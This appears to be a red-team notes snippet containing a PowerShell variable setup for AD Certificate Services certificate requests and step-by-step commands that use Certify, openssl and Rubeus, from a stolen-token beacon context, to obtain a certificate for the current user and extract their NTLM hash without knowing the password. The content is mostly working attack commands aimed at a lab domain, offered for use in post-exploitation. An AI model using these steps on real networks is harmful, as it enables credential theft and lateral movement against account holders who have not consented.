b4cktr4ck2

#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. 
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

b4cktr4ck2

If you're in a user's context where you don't have their password (I.e they ran a beacon/steal_token/other stuff) and ADCS is enabled,  you can use Certify + Rubeus to request a certificate and get their NTLM hash.

1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA 
2. Copypaste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE to a file ending in .pem onto a Linux box
3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
^Can substitute base64 string instead of uploading pfx.